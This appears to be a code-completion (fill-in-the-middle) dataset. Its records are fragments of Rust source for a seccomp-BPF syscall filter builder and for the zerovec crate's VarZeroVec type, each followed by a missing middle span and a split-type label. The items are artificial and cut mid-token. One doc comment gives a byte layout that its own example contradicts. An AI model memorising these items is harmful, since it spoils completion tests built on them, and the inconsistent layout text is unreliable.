/// // Jump to the next instruction if the loaded value is equal to 42.
/// BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 42, 1, 0);
/// ```
pub const fn BPF_JUMP(code: u16, k: u32, jt: u8, jf: u8) -> sock_filter {
sock_filter { code, jt, jf, k }
}
/// Loads the syscall number into `seccomp_data.nr`.
pub const LOAD_SYSCALL_NR: sock_filter = BPF_STMT(BPF_LD + BPF_W + BPF_ABS, SECCOMP_DATA_OFFSET_NR);
/// Returns from the seccomp filter, allowing the syscall to pass through.
#[allow(unused)]
pub const ALLOW: sock_filter = BPF_STMT(BPF_RET + BPF_K, libc::SECCOMP_RET_ALLOW);
/// Returns from the seccomp filter, instructing the kernel to kill the calling
/// thread with `SIGSYS` before executing the syscall.
#[allow(unused)]
pub const DENY: sock_filter = BPF
|
is_empty
|
identifier_name
|
bpf.rs
|
32 = 0x8000_0000;
const __AUDIT_ARCH_LE: u32 = 0x4000_0000;
// These are defined in `/include/uapi/linux/audit.h`.
pub const AUDIT_ARCH_X86: u32 = EM_386 | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_X86_64: u32 = EM_X86_64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_ARM: u32 = EM_ARM | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_AARCH64: u32 = EM_AARCH64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_MIPS: u32 = EM_MIPS;
pub const AUDIT_ARCH_PPC: u32 = EM_PPC;
pub const AUDIT_ARCH_PPC64: u32 = EM_PPC64 | __AUDIT_ARCH_64BIT;
bitflags::bitflags! {
#[derive(Default)]
struct FilterFlags: u32 {
const TSYNC = 1 << 0;
const LOG = 1 << 1;
const SPEC_ALLOW = 1 << 2;
const NEW_LISTENER = 1 << 3;
const TSYNC_ESRCH = 1 << 4;
}
}
/// Seccomp-BPF program byte code.
#[derive(Debug, Clone, Eq, PartialEq)]
pub struct Filter {
// Since the limit is 4096 instructions, we *could* use a static array here
// instead. However, that would require bounds checks each time an
// instruction is appended and complicate the interface with `Result` types
// and error handling logic. It's cleaner to just check the size when the
// program is loaded.
filter: Vec<sock_filter>,
}
impl Filter {
/// Creates a new, empty seccomp program. Note that empty BPF programs are not
/// valid and will fail to load.
pub const fn new() -> Self {
Self { filter: Vec::new() }
}
/// Appends a single instruction to the seccomp-BPF program.
pub fn push(&mut self, instruction: sock_filter) {
self.filter.push(instruction);
}
/// Returns the number of instructions in the BPF program.
pub fn len(&self) -> usize {
self.filter.len()
}
/// Returns true if the program is empty. Empty seccomp filters will result
/// in an error when loaded.
pub fn is_empty(&self) -> bool {
self.filter.is_empty()
}
fn install(&self, flags: FilterFlags) -> Result<i32, Errno> {
let len = self.filter.len();
if len == 0 || len > BPF_MAXINSNS {
return Err(Errno::EINVAL);
}
let prog = libc::sock_fprog {
// Note: length is guaranteed to be less than `u16::MAX` because of
// the above check.
len: len as u16,
filter: self.filter.as_ptr() as *mut _,
};
let ptr = &prog as *const libc::sock_fprog;
let value = Errno::result(unsafe {
libc::syscall(
libc::SYS_seccomp,
SECCOMP_SET_MODE_FILTER,
flags.bits(),
ptr,
)
})?;
Ok(value as i32)
}
/// Loads the program via seccomp into the current process.
///
/// Once loaded, the seccomp filter can never be removed. Additional seccomp
/// filters can be loaded, however, and they will chain together and be
/// executed in reverse order.
///
/// NOTE: The maximum size of any single seccomp-bpf filter is 4096
/// instructions. The overall limit is 32768 instructions across all loaded
/// filters.
///
/// See [`seccomp(2)`](https://man7.org/linux/man-pages/man2/seccomp.2.html)
/// for more details.
pub fn load(&self) -> Result<(), Errno> {
self.install(FilterFlags::empty())?;
Ok(())
}
/// This is the same as [`Filter::load`] except that it returns a file
/// descriptor. This is meant to be used with
/// [`seccomp_unotify(2)`](https://man7.org/linux/man-pages/man2/seccomp_unotify.2.html).
pub fn load_and_listen(&self) -> Result<Fd, Errno> {
let fd = self.install(FilterFlags::NEW_LISTENER)?;
Ok(Fd::new(fd))
}
}
impl Extend<sock_filter> for Filter {
fn extend<T: IntoIterator<Item = sock_filter>>(&mut self, iter: T) {
self.filter.extend(iter)
}
}
/// Trait for types that can emit BPF byte code.
pub trait ByteCode {
/// Accumulates BPF instructions into the given filter.
fn into_bpf(self, filter: &mut Filter);
}
impl<F> ByteCode for F
where
F: FnOnce(&mut Filter),
{
fn into_bpf(self, filter: &mut Filter) {
self(filter)
}
}
impl ByteCode for sock_filter {
fn into_bpf(self, filter: &mut Filter)
|
}
/// Returns a seccomp-bpf filter containing the given list of instructions.
///
/// This can be concatenated with other seccomp-BPF programs.
///
/// Note that this is not a true BPF program. Seccomp-bpf is a subset of BPF and
/// so many instructions are not available.
///
/// When executing instructions, the BPF program operates on the syscall
/// information made available as a (read-only) buffer of the following form:
///
/// ```no_compile
/// struct seccomp_data {
/// // The syscall number.
/// nr: u32,
/// // `AUDIT_ARCH_*` value (see `<linux/audit.h>`).
/// arch: u32,
/// // CPU instruction pointer.
/// instruction_pointer: u64,
/// // Up to 6 syscall arguments.
/// args: [u64; 6],
/// }
/// ```
///
/// # Example
///
/// This filter will allow only the specified syscalls.
/// ```
/// let _filter = seccomp_bpf![
/// // Make sure the target process is using the x86-64 syscall ABI.
/// VALIDATE_ARCH(AUDIT_ARCH_X86_64),
/// // Load the current syscall number into `seccomp_data.nr`.
/// LOAD_SYSCALL_NR,
/// // Check if `seccomp_data.nr` matches the given syscalls. If so, then return
/// // from the seccomp filter early, allowing the syscall to continue.
/// SYSCALL(Sysno::open, ALLOW),
/// SYSCALL(Sysno::close, ALLOW),
/// SYSCALL(Sysno::write, ALLOW),
/// SYSCALL(Sysno::read, ALLOW),
/// // Deny all other syscalls by having the kernel kill the current thread with
/// // `SIGSYS`.
/// DENY,
/// ];
/// ```
#[cfg(test)]
macro_rules! seccomp_bpf {
($($inst:expr),+ $(,)?) => {
{
let mut filter = Filter::new();
$(
$inst.into_bpf(&mut filter);
)+
filter
}
};
}
// See: /include/uapi/linux/filter.h
pub const fn BPF_STMT(code: u16, k: u32) -> sock_filter {
sock_filter {
code,
jt: 0,
jf: 0,
k,
}
}
/// A BPF jump instruction.
///
/// # Arguments
///
/// * `code` is the operation code.
/// * `k` is the value operated on for comparisons.
/// * `jt` is the relative offset to jump to if the comparison is true.
/// * `jf` is the relative offset to jump to if the comparison is false.
///
/// # Example
///
/// ```no_compile
/// // Jump to the next instruction if the loaded value is equal to 42.
/// BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 42, 1, 0);
/// ```
pub const fn BPF_JUMP(code: u16, k: u32, jt: u8, jf: u8) -> sock_filter {
sock_filter { code, jt, jf, k }
}
/// Loads the syscall number into `seccomp_data.nr`.
pub const LOAD_SYSCALL_NR: sock_filter = BPF_STMT(BPF_LD + BPF_W + BPF_ABS, SECCOMP_DATA_OFFSET_NR);
/// Returns from the seccomp filter, allowing the syscall to pass through.
#[allow(unused)]
pub const ALLOW: sock_filter = BPF_STMT(BPF_RET + BPF_K, libc::SECCOMP_RET_ALLOW);
/// Returns from the seccomp filter, instructing the kernel to kill the calling
/// thread with `SIGSYS` before executing the syscall.
#[allow(unused)]
pub const DENY: sock_filter = B
|
{
filter.push(self)
}
|
identifier_body
|
bpf.rs
|
pub const AUDIT_ARCH_X86_64: u32 = EM_X86_64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_ARM: u32 = EM_ARM | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_AARCH64: u32 = EM_AARCH64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_MIPS: u32 = EM_MIPS;
pub const AUDIT_ARCH_PPC: u32 = EM_PPC;
pub const AUDIT_ARCH_PPC64: u32 = EM_PPC64 | __AUDIT_ARCH_64BIT;
bitflags::bitflags! {
#[derive(Default)]
struct FilterFlags: u32 {
const TSYNC = 1 << 0;
const LOG = 1 << 1;
const SPEC_ALLOW = 1 << 2;
const NEW_LISTENER = 1 << 3;
const TSYNC_ESRCH = 1 << 4;
}
}
/// Seccomp-BPF program byte code.
#[derive(Debug, Clone, Eq, PartialEq)]
pub struct Filter {
// Since the limit is 4096 instructions, we *could* use a static array here
// instead. However, that would require bounds checks each time an
// instruction is appended and complicate the interface with `Result` types
// and error handling logic. It's cleaner to just check the size when the
// program is loaded.
filter: Vec<sock_filter>,
}
impl Filter {
/// Creates a new, empty seccomp program. Note that empty BPF programs are not
/// valid and will fail to load.
pub const fn new() -> Self {
Self { filter: Vec::new() }
}
/// Appends a single instruction to the seccomp-BPF program.
pub fn push(&mut self, instruction: sock_filter) {
self.filter.push(instruction);
}
/// Returns the number of instructions in the BPF program.
pub fn len(&self) -> usize {
self.filter.len()
}
/// Returns true if the program is empty. Empty seccomp filters will result
/// in an error when loaded.
pub fn is_empty(&self) -> bool {
self.filter.is_empty()
}
fn install(&self, flags: FilterFlags) -> Result<i32, Errno> {
let len = self.filter.len();
if len == 0 || len > BPF_MAXINSNS {
return Err(Errno::EINVAL);
}
let prog = libc::sock_fprog {
// Note: length is guaranteed to be less than `u16::MAX` because of
// the above check.
len: len as u16,
filter: self.filter.as_ptr() as *mut _,
};
let ptr = &prog as *const libc::sock_fprog;
let value = Errno::result(unsafe {
libc::syscall(
libc::SYS_seccomp,
SECCOMP_SET_MODE_FILTER,
flags.bits(),
ptr,
)
})?;
Ok(value as i32)
}
/// Loads the program via seccomp into the current process.
///
/// Once loaded, the seccomp filter can never be removed. Additional seccomp
/// filters can be loaded, however, and they will chain together and be
/// executed in reverse order.
///
/// NOTE: The maximum size of any single seccomp-bpf filter is 4096
/// instructions. The overall limit is 32768 instructions across all loaded
/// filters.
///
/// See [`seccomp(2)`](https://man7.org/linux/man-pages/man2/seccomp.2.html)
/// for more details.
pub fn load(&self) -> Result<(), Errno> {
self.install(FilterFlags::empty())?;
Ok(())
}
/// This is the same as [`Filter::load`] except that it returns a file
/// descriptor. This is meant to be used with
/// [`seccomp_unotify(2)`](https://man7.org/linux/man-pages/man2/seccomp_unotify.2.html).
pub fn load_and_listen(&self) -> Result<Fd, Errno> {
let fd = self.install(FilterFlags::NEW_LISTENER)?;
Ok(Fd::new(fd))
}
}
impl Extend<sock_filter> for Filter {
fn extend<T: IntoIterator<Item = sock_filter>>(&mut self, iter: T) {
self.filter.extend(iter)
}
}
/// Trait for types that can emit BPF byte code.
pub trait ByteCode {
/// Accumulates BPF instructions into the given filter.
fn into_bpf(self, filter: &mut Filter);
}
impl<F> ByteCode for F
where
F: FnOnce(&mut Filter),
{
fn into_bpf(self, filter: &mut Filter) {
self(filter)
}
}
impl ByteCode for sock_filter {
fn into_bpf(self, filter: &mut Filter) {
filter.push(self)
}
}
/// Returns a seccomp-bpf filter containing the given list of instructions.
///
/// This can be concatenated with other seccomp-BPF programs.
///
/// Note that this is not a true BPF program. Seccomp-bpf is a subset of BPF and
/// so many instructions are not available.
///
/// When executing instructions, the BPF program operates on the syscall
/// information made available as a (read-only) buffer of the following form:
///
/// ```no_compile
/// struct seccomp_data {
/// // The syscall number.
/// nr: u32,
/// // `AUDIT_ARCH_*` value (see `<linux/audit.h>`).
/// arch: u32,
/// // CPU instruction pointer.
/// instruction_pointer: u64,
/// // Up to 6 syscall arguments.
/// args: [u64; 6],
/// }
/// ```
///
/// # Example
///
/// This filter will allow only the specified syscalls.
/// ```
/// let _filter = seccomp_bpf![
/// // Make sure the target process is using the x86-64 syscall ABI.
/// VALIDATE_ARCH(AUDIT_ARCH_X86_64),
/// // Load the current syscall number into `seccomp_data.nr`.
/// LOAD_SYSCALL_NR,
/// // Check if `seccomp_data.nr` matches the given syscalls. If so, then return
/// // from the seccomp filter early, allowing the syscall to continue.
/// SYSCALL(Sysno::open, ALLOW),
/// SYSCALL(Sysno::close, ALLOW),
/// SYSCALL(Sysno::write, ALLOW),
/// SYSCALL(Sysno::read, ALLOW),
/// // Deny all other syscalls by having the kernel kill the current thread with
/// // `SIGSYS`.
/// DENY,
/// ];
/// ```
#[cfg(test)]
macro_rules! seccomp_bpf {
($($inst:expr),+ $(,)?) => {
{
let mut filter = Filter::new();
$(
$inst.into_bpf(&mut filter);
)+
filter
}
};
}
// See: /include/uapi/linux/filter.h
pub const fn BPF_STMT(code: u16, k: u32) -> sock_filter {
sock_filter {
code,
jt: 0,
jf: 0,
k,
}
}
/// A BPF jump instruction.
///
/// # Arguments
///
/// * `code` is the operation code.
/// * `k` is the value operated on for comparisons.
/// * `jt` is the relative offset to jump to if the comparison is true.
/// * `jf` is the relative offset to jump to if the comparison is false.
///
/// # Example
///
/// ```no_compile
/// // Jump to the next instruction if the loaded value is equal to 42.
/// BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 42, 1, 0);
/// ```
pub const fn BPF_JUMP(code: u16, k: u32, jt: u8, jf: u8) -> sock_filter {
sock_filter { code, jt, jf, k }
}
/// Loads the syscall number into `seccomp_data.nr`.
pub const LOAD_SYSCALL_NR: sock_filter = BPF_STMT(BPF_LD + BPF_W + BPF_ABS, SECCOMP_DATA_OFFSET_NR);
/// Returns from the seccomp filter, allowing the syscall to pass through.
#[allow(unused)]
pub const ALLOW: sock_filter = BPF_STMT(BPF_RET + BPF_K, libc::SECCOMP_RET_ALLOW);
/// Returns from the seccomp filter, instructing the kernel to kill the calling
/// thread with `SIGSYS` before executing the syscall.
#[allow(unused)]
|
const __AUDIT_ARCH_64BIT: u32 = 0x8000_0000;
const __AUDIT_ARCH_LE: u32 = 0x4000_0000;
// These are defined in `/include/uapi/linux/audit.h`.
pub const AUDIT_ARCH_X86: u32 = EM_386 | __AUDIT_ARCH_LE;
|
random_line_split
|
|
vec.rs
|
borrowed VarZeroVec, requiring no allocations.
///
/// If a mutating operation is invoked on VarZeroVec, the Borrowed is converted to Owned.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let bytes = &[
/// 4, 0, 0, 0, 0, 0, 1, 0, 3, 0, 6, 0, 119, 207, 137, 230, 150, 135, 240,
/// 145, 132, 131,
/// ];
///
/// let vzv: VarZeroVec<str> = VarZeroVec::parse_byte_slice(bytes).unwrap();
/// assert!(matches!(vzv, VarZeroVec::Borrowed(_)));
/// ```
Borrowed(&'a VarZeroSlice<T, F>),
}
impl<'a, T: ?Sized, F> Clone for VarZeroVec<'a, T, F> {
fn clone(&self) -> Self {
match *self {
VarZeroVec::Owned(ref o) => o.clone().into(),
VarZeroVec::Borrowed(b) => b.into(),
}
}
}
impl<T: VarULE + ?Sized, F: VarZeroVecFormat> fmt::Debug for VarZeroVec<'_, T, F>
where
T: fmt::Debug,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
VarZeroSlice::fmt(self, f)
}
}
impl<'a, T: ?Sized, F> From<VarZeroVecOwned<T, F>> for VarZeroVec<'a, T, F> {
#[inline]
fn from(other: VarZeroVecOwned<T, F>) -> Self {
VarZeroVec::Owned(other)
}
}
impl<'a, T: ?Sized, F> From<&'a VarZeroSlice<T, F>> for VarZeroVec<'a, T, F> {
fn from(other: &'a VarZeroSlice<T, F>) -> Self {
VarZeroVec::Borrowed(other)
}
}
impl<'a, T: ?Sized + VarULE, F: VarZeroVecFormat> From<VarZeroVec<'a, T, F>>
for VarZeroVecOwned<T, F>
{
#[inline]
fn from(other: VarZeroVec<'a, T, F>) -> Self {
match other {
VarZeroVec::Owned(o) => o,
VarZeroVec::Borrowed(b) => b.into(),
}
}
}
impl<T: VarULE + ?Sized> Default for VarZeroVec<'_, T> {
#[inline]
fn default() -> Self {
Self::new()
}
}
impl<T: VarULE + ?Sized, F: VarZeroVecFormat> Deref for VarZeroVec<'_, T, F> {
type Target = VarZeroSlice<T, F>;
fn deref(&self) -> &VarZeroSlice<T, F> {
self.as_slice()
}
}
impl<'a, T: VarULE + ?Sized, F: VarZeroVecFormat> VarZeroVec<'a, T, F> {
/// Creates a new, empty `VarZeroVec<T>`.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let vzv: VarZeroVec<str> = VarZeroVec::new();
/// assert!(vzv.is_empty());
/// ```
#[inline]
pub const fn new() -> Self {
Self::Borrowed(VarZeroSlice::new_empty())
}
/// Parse a VarZeroVec from a slice of the appropriate format
///
/// Slices of the right format can be obtained via [`VarZeroSlice::as_bytes()`].
///
/// # Example
///
/// ```rust
/// # use std::str::Utf8Error;
/// # use zerovec::ule::ZeroVecError;
/// # use zerovec::VarZeroVec;
///
/// let strings = vec!["foo", "bar", "baz", "quux"];
/// let vec = VarZeroVec::<str>::from(&strings);
///
/// assert_eq!(&vec[0], "foo");
/// assert_eq!(&vec[1], "bar");
/// assert_eq!(&vec[2], "baz");
/// assert_eq!(&vec[3], "quux");
/// # Ok::<(), ZeroVecError>(())
/// ```
pub fn parse_byte_slice(slice: &'a [u8]) -> Result<Self, ZeroVecError> {
let borrowed = VarZeroSlice::<T, F>::parse_byte_slice(slice)?;
Ok(VarZeroVec::Borrowed(borrowed))
}
/// Uses a `&[u8]` buffer as a `VarZeroVec<T>` without any verification.
///
/// # Safety
///
/// `bytes` need to be an output from [`VarZeroSlice::as_bytes()`].
pub const unsafe fn from_bytes_unchecked(bytes: &'a [u8]) -> Self {
Self::Borrowed(core::mem::transmute(bytes))
}
/// Convert this into a mutable vector of the owned `T` type, cloning if necessary.
///
///
/// # Example
///
/// ```rust,ignore
/// # use std::str::Utf8Error;
/// # use zerovec::ule::ZeroVecError;
/// # use zerovec::VarZeroVec;
///
/// let strings = vec!["foo", "bar", "baz", "quux"];
/// let mut vec = VarZeroVec::<str>::from(&strings);
///
/// assert_eq!(vec.len(), 4);
/// let mutvec = vec.make_mut();
/// mutvec.push("lorem ipsum".into());
/// mutvec[2] = "dolor sit".into();
/// assert_eq!(&vec[0], "foo");
/// assert_eq!(&vec[1], "bar");
/// assert_eq!(&vec[2], "dolor sit");
/// assert_eq!(&vec[3], "quux");
/// assert_eq!(&vec[4], "lorem ipsum");
/// # Ok::<(), ZeroVecError>(())
/// ```
//
// This function is crate-public for now since we don't yet want to stabilize
// the internal implementation details
pub fn make_mut(&mut self) -> &mut VarZeroVecOwned<T, F> {
match self {
VarZeroVec::Owned(ref mut vec) => vec,
VarZeroVec::Borrowed(slice) => {
let new_self = VarZeroVecOwned::from_slice(slice);
*self = new_self.into();
// recursion is limited since we are guaranteed to hit the Owned branch
self.make_mut()
}
}
}
/// Converts a borrowed ZeroVec to an owned ZeroVec. No-op if already owned.
///
/// # Example
///
/// ```
/// # use std::str::Utf8Error;
/// # use zerovec::ule::ZeroVecError;
/// # use zerovec::VarZeroVec;
///
/// let strings = vec!["foo", "bar", "baz", "quux"];
/// let vec = VarZeroVec::<str>::from(&strings);
///
/// assert_eq!(vec.len(), 4);
/// // has 'static lifetime
/// let owned = vec.into_owned();
/// # Ok::<(), ZeroVecError>(())
/// ```
pub fn into_owned(mut self) -> VarZeroVec<'static, T, F> {
self.make_mut();
match self {
VarZeroVec::Owned(vec) => vec.into(),
_ => unreachable!(),
}
}
/// Obtain this `VarZeroVec` as a [`VarZeroSlice`]
pub fn as_slice(&self) -> &VarZeroSlice<T, F> {
match *self {
VarZeroVec::Owned(ref owned) => owned,
VarZeroVec::Borrowed(b) => b,
}
}
/// Takes the byte vector representing the encoded data of this VarZeroVec. If borrowed,
/// this function allocates a byte vector and copies the borrowed bytes into it.
///
/// The bytes can be passed back to [`Self::parse_byte_slice()`].
///
/// To get a reference to the bytes without moving, see [`VarZeroSlice::as_bytes()`].
///
/// # Example
///
/// ```rust
/// # use std::str::Utf8Error;
/// # use zerovec::ule::ZeroVecError;
/// # use zerovec::VarZeroVec;
///
/// let strings = vec!["foo", "bar", "baz"];
/// let bytes = VarZeroVec::<str>::from(&strings).into_bytes();
///
/// let mut borrowed: VarZeroVec<str> = VarZeroVec::parse_byte_slice(&bytes)?;
/// assert_eq!(borrowed, &*strings);
///
/// # Ok::<(), ZeroVecError>(())
/// ```
pub fn into_byt
|
es(self) -
|
identifier_name
|
|
vec.rs
|
"文", "𑄃"];
///
/// #[derive(serde::Serialize, serde::Deserialize)]
/// struct Data<'a> {
/// #[serde(borrow)]
/// strings: VarZeroVec<'a, str>,
/// }
///
/// let data = Data {
/// strings: VarZeroVec::from(&strings),
/// };
///
/// let bincode_bytes =
/// bincode::serialize(&data).expect("Serialization should be successful");
///
/// // Will deserialize without allocations
/// let deserialized: Data = bincode::deserialize(&bincode_bytes)
/// .expect("Deserialization should be successful");
///
/// assert_eq!(deserialized.strings.get(2), Some("文"));
/// assert_eq!(deserialized.strings, &*strings);
/// # Ok::<(), ZeroVecError>(())
/// ```
///
/// Here's another example with `ZeroSlice<T>` (similar to `[T]`):
///
/// ```rust
/// # use std::str::Utf8Error;
/// # use zerovec::ule::ZeroVecError;
/// use zerovec::ule::*;
/// use zerovec::VarZeroVec;
/// use zerovec::ZeroSlice;
/// use zerovec::ZeroVec;
///
/// // The structured list corresponds to the list of integers.
/// let numbers: &[&[u32]] = &[
/// &[12, 25, 38],
/// &[39179, 100],
/// &[42, 55555],
/// &[12345, 54321, 9],
/// ];
///
/// #[derive(serde::Serialize, serde::Deserialize)]
/// struct Data<'a> {
/// #[serde(borrow)]
/// vecs: VarZeroVec<'a, ZeroSlice<u32>>,
/// }
///
/// let data = Data {
/// vecs: VarZeroVec::from(numbers),
/// };
///
/// let bincode_bytes =
/// bincode::serialize(&data).expect("Serialization should be successful");
///
/// let deserialized: Data = bincode::deserialize(&bincode_bytes)
/// .expect("Deserialization should be successful");
///
/// assert_eq!(deserialized.vecs[0].get(1).unwrap(), 25);
/// assert_eq!(deserialized.vecs[1], *numbers[1]);
///
/// # Ok::<(), ZeroVecError>(())
/// ```
///
/// [`VarZeroVec`]s can be nested infinitely via a similar mechanism; see the docs of [`VarZeroSlice`]
/// for more information.
///
/// # How it Works
///
/// `VarZeroVec<T>`, when used with non-human-readable serializers (like `bincode`), will
/// serialize to a specially formatted list of bytes. The format is:
///
/// - 4 bytes for `length` (interpreted as a little-endian u32)
/// - `4 * length` bytes of `indices` (interpreted as little-endian u32)
/// - Remaining bytes for actual `data`
///
/// Each element in the `indices` array points to the starting index of its corresponding
/// data part in the `data` list. The ending index can be calculated from the starting index
/// of the next element (or the length of the slice if dealing with the last element).
///
/// See [the design doc](https://github.com/unicode-org/icu4x/blob/main/utils/zerovec/design_doc.md) for more details.
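///
/// As a worked illustration (an editorial sketch, not part of the upstream docs), the
/// 22-byte buffer used in the `Borrowed` doctest below stores four strings. Note that the
/// default `Index16` format used there stores each index as a little-endian `u16` (2 bytes),
/// so the buffer breaks down as:
///
/// ```no_compile
/// // length  (u32 LE):      4, 0, 0, 0                          -> 4 elements
/// // indices (u16 LE each): 0,0  1,0  3,0  6,0                  -> starts at 0, 1, 3, 6
/// // data    (UTF-8):       119 | 207,137 | 230,150,135 | 240,145,132,131
/// //                        "w"   "ω"       "文"            "𑄃"
/// ```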
///
/// [`ule`]: crate::ule
#[non_exhaustive]
pub enum VarZeroVec<'a, T: ?Sized, F = Index16> {
/// An allocated VarZeroVec, allowing for mutations.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let mut vzv = VarZeroVec::<str>::default();
/// vzv.make_mut().push("foo");
/// vzv.make_mut().push("bar");
/// assert!(matches!(vzv, VarZeroVec::Owned(_)));
/// ```
Owned(VarZeroVecOwned<T, F>),
/// A borrowed VarZeroVec, requiring no allocations.
///
/// If a mutating operation is invoked on VarZeroVec, the Borrowed is converted to Owned.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let bytes = &[
/// 4, 0, 0, 0, 0, 0, 1, 0, 3, 0, 6, 0, 119, 207, 137, 230, 150, 135, 240,
/// 145, 132, 131,
/// ];
///
/// let vzv: VarZeroVec<str> = VarZeroVec::parse_byte_slice(bytes).unwrap();
/// assert!(matches!(vzv, VarZeroVec::Borrowed(_)));
/// ```
Borrowed(&'a VarZeroSlice<T, F>),
}
impl<'a, T: ?Sized, F> Clone for VarZeroVec<'a, T, F> {
fn clone(&self) -> Self {
match *self {
VarZeroVec::Owned(ref o) => o.clone().into(),
VarZeroVec::Borrowed(b) => b.into(),
}
}
}
impl<T: VarULE + ?Sized, F: VarZeroVecFormat> fmt::Debug for VarZeroVec<'_, T, F>
where
T: fmt::Debug,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
|
<'a, T: ?Sized, F> From<VarZeroVecOwned<T, F>> for VarZeroVec<'a, T, F> {
#[inline]
fn from(other: VarZeroVecOwned<T, F>) -> Self {
VarZeroVec::Owned(other)
}
}
impl<'a, T: ?Sized, F> From<&'a VarZeroSlice<T, F>> for VarZeroVec<'a, T, F> {
fn from(other: &'a VarZeroSlice<T, F>) -> Self {
VarZeroVec::Borrowed(other)
}
}
impl<'a, T: ?Sized + VarULE, F: VarZeroVecFormat> From<VarZeroVec<'a, T, F>>
for VarZeroVecOwned<T, F>
{
#[inline]
fn from(other: VarZeroVec<'a, T, F>) -> Self {
match other {
VarZeroVec::Owned(o) => o,
VarZeroVec::Borrowed(b) => b.into(),
}
}
}
impl<T: VarULE + ?Sized> Default for VarZeroVec<'_, T> {
#[inline]
fn default() -> Self {
Self::new()
}
}
impl<T: VarULE + ?Sized, F: VarZeroVecFormat> Deref for VarZeroVec<'_, T, F> {
type Target = VarZeroSlice<T, F>;
fn deref(&self) -> &VarZeroSlice<T, F> {
self.as_slice()
}
}
impl<'a, T: VarULE + ?Sized, F: VarZeroVecFormat> VarZeroVec<'a, T, F> {
/// Creates a new, empty `VarZeroVec<T>`.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let vzv: VarZeroVec<str> = VarZeroVec::new();
/// assert!(vzv.is_empty());
/// ```
#[inline]
pub const fn new() -> Self {
Self::Borrowed(VarZeroSlice::new_empty())
}
/// Parse a VarZeroVec from a slice of the appropriate format
///
/// Slices of the right format can be obtained via [`VarZeroSlice::as_bytes()`].
///
/// # Example
///
/// ```rust
/// # use std::str::Utf8Error;
/// # use zerovec::ule::ZeroVecError;
/// # use zerovec::VarZeroVec;
///
/// let strings = vec!["foo", "bar", "baz", "quux"];
/// let vec = VarZeroVec::<str>::from(&strings);
///
/// assert_eq!(&vec[0], "foo");
/// assert_eq!(&vec[1], "bar");
/// assert_eq!(&vec[2], "baz");
/// assert_eq!(&vec[3], "quux");
/// # Ok::<(), ZeroVecError>(())
/// ```
pub fn parse_byte_slice(slice: &'a [u8]) -> Result<Self, ZeroVecError> {
let borrowed = VarZeroSlice::<T, F>::parse_byte_slice(slice)?;
Ok(VarZeroVec::Borrowed(borrowed))
}
/// Uses a `&[u8]` buffer as a `VarZeroVec<T>` without any verification.
///
/// # Safety
///
/// `bytes` need to be an output from [`VarZeroSlice::as_bytes()`].
pub const unsafe fn from_bytes_unchecked(bytes: &'a [u8]) -> Self {
Self::Borrowed(core::
|
VarZeroSlice::fmt(self, f)
}
}
impl
|
identifier_body
|
vec.rs
|
"文", "𑄃"];
///
/// #[derive(serde::Serialize, serde::Deserialize)]
/// struct Data<'a> {
/// #[serde(borrow)]
/// strings: VarZeroVec<'a, str>,
/// }
///
/// let data = Data {
/// strings: VarZeroVec::from(&strings),
/// };
///
/// let bincode_bytes =
/// bincode::serialize(&data).expect("Serialization should be successful");
///
/// // Will deserialize without allocations
/// let deserialized: Data = bincode::deserialize(&bincode_bytes)
/// .expect("Deserialization should be successful");
///
/// assert_eq!(deserialized.strings.get(2), Some("文"));
/// assert_eq!(deserialized.strings, &*strings);
/// # Ok::<(), ZeroVecError>(())
/// ```
///
/// Here's another example with `ZeroSlice<T>` (similar to `[T]`):
///
/// ```rust
|
/// # use zerovec::ule::ZeroVecError;
/// use zerovec::ule::*;
/// use zerovec::VarZeroVec;
/// use zerovec::ZeroSlice;
/// use zerovec::ZeroVec;
///
/// // The structured list corresponds to the list of integers.
/// let numbers: &[&[u32]] = &[
/// &[12, 25, 38],
/// &[39179, 100],
/// &[42, 55555],
/// &[12345, 54321, 9],
/// ];
///
/// #[derive(serde::Serialize, serde::Deserialize)]
/// struct Data<'a> {
/// #[serde(borrow)]
/// vecs: VarZeroVec<'a, ZeroSlice<u32>>,
/// }
///
/// let data = Data {
/// vecs: VarZeroVec::from(numbers),
/// };
///
/// let bincode_bytes =
/// bincode::serialize(&data).expect("Serialization should be successful");
///
/// let deserialized: Data = bincode::deserialize(&bincode_bytes)
/// .expect("Deserialization should be successful");
///
/// assert_eq!(deserialized.vecs[0].get(1).unwrap(), 25);
/// assert_eq!(deserialized.vecs[1], *numbers[1]);
///
/// # Ok::<(), ZeroVecError>(())
/// ```
///
/// [`VarZeroVec`]s can be nested infinitely via a similar mechanism; see the docs of [`VarZeroSlice`]
/// for more information.
///
/// # How it Works
///
/// `VarZeroVec<T>`, when used with non-human-readable serializers (like `bincode`), will
/// serialize to a specially formatted list of bytes. The format is:
///
/// - 4 bytes for `length` (interpreted as a little-endian u32)
/// - `4 * length` bytes of `indices` (interpreted as little-endian u32)
/// - Remaining bytes for actual `data`
///
/// Each element in the `indices` array points to the starting index of its corresponding
/// data part in the `data` list. The ending index can be calculated from the starting index
/// of the next element (or the length of the slice if dealing with the last element).
///
/// See [the design doc](https://github.com/unicode-org/icu4x/blob/main/utils/zerovec/design_doc.md) for more details.
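///
/// As a small editorial sketch (not upstream code) of the end-index rule described above,
/// using the data bytes from the `Borrowed` doctest below:
///
/// ```no_compile
/// let data: &[u8] = &[119, 207, 137, 230, 150, 135, 240, 145, 132, 131];
/// let indices: [usize; 4] = [0, 1, 3, 6];
/// // An element ends where the next one starts; the last element ends at data.len().
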